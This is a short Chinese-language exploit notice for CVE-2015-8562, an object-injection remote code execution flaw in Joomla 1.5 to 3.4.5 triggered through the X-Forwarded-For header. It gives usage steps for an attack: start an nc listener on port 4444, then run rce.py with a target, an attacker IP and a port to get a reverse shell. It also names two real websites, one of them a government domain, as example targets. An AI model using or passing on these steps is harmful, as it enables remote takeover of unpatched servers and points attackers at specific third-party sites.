漏洞利用:Joomla 1.5 - 3.4.5 对象注入 RCE X-Forwarded-For 头:
漏洞日期:2015年12月17日
漏洞利用作者:anarc0der
版本:Joomla 1.5 至 3.4.5
CVE:CVE-2015-8562
使用方法:
打开一个终端并使用 nc 监听:$ nc -lnvp 4444
打开另一个终端并执行漏洞利用:
python3 rce.py --target='目标' --ip='IP' --port=4444
PoC 示例目标(请勿攻击它们,仅供其他人作为示例使用):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/